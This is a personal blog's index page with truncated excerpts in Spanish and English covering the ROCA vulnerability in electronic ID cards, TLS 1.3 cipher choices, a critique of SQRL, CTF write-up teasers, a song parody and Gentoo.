En Febrero de 2017 se reportó la vulnerabilidad conocida como Return of Coppersmith’s Attack (ROCA) con CVE-2017-15361 y que afectó entre otros dispositivos a una gran cantidad de DNIs electrónicos con chip gemalto. La solución aplicada en el caso de los DNIs fue revocar (impedir uso futuro) las claves afectadas y expedir nuevas claves de […]
Continue readingSome notes on cipher choices and TLS1.3
After some discussion about TLS1.3 and ciphers with a few colleagues, I have decided to write a short summary of “the basics” you need to know as a developer. Here I will also explain shortly a bit which niche each of the 5 ciphers aims for and what the hash function they contain is actually […]
Continue readingEl “secreto” tras el permitir las cenas de navidad con el Coronavirus
Hay un gran “secreto” tras muchas de las cosas que llevan pasando en el mundo desde hace muchos años: las decisiones que toman gobiernos y empresas, cómo deciden las grandes fortunas en qué invertir, cómo se decide la mejor forma de tratar a un paciente, cómo se decide que hacer para evitar que “hackeen” un […]
Continue readingEuskal Encounter 28 y las memorias de la Campus Party España 16
Quien recuerde el periodo desde el fin de la 15ª edición de la Campus Party España (#CPES15) y la 16ª (#CPES16) seguramente sabrá de que vengo a hablar, pero en 9 años las generaciones han cambiado mucho y hay gente que ha olvidado su pasado por el simple hecho de no haberlo vivido. En esta […]
Continue readingWhat a pitiful world
Today I have decided to destroy Louis Armstrong’s famous “what a wonderful” world with a version that describes more accurately the world in which we live: I see misquotes, fake news too, I see them harm, and go against you, And I think to myself what a pitiful world. I see vague words, lies of […]
Continue readingWeaponizing squirrels (or why I can’t recommend SQRL)
After seeing Steve Gibson’s talk about SQRL today it just occured to me how easy it would be to weaponize SQRL to effectively attain permanency on systems. Below I’ll present a few attack scenarios that can give an idea of some of the vulnerabilities of the system that make me uncomfortable.
Continue readingSecurity Fest CTF *-bit challenges, organizer writeup
I wrote the 128-bit, 512-bit and 1024-bit challenges for the Security Fest CTF, this year’s topic was Swordfish so the challenges follow the idea of the quotes being used in the movie regarding 128-bit, 512-bit and 1024-bit ciphers. Sadly, neither of the challenges were solved despite my best attempts. In this post I’ll explain how […]
Continue readingAssured MQTT challenge write-up
In this write-up I’ll cover my solution to Assured’s MQTT challenge, I’ll also explain what their intended solution was.
Continue readingPaF||STFU
If you have been working in the IT security industry, you have probably heard CISOs (Chief Information Security Officers) complain about how companies fail at improving their security and pentesters complain about how their findings are ignored by companies. Whilst there is clearly no one-size fits-all solution to such problems, in this post I will […]
Continue readingHow Gentoo has influenced my approach to issue reporting
As some of you may know I have been a Gentoo user for many years. Although you can create and use binary caches, in Gentoo the primary way of installing software packages is by compiling them at the spot. In this post I will try to explain some of the advantages of this and how […]
Continue reading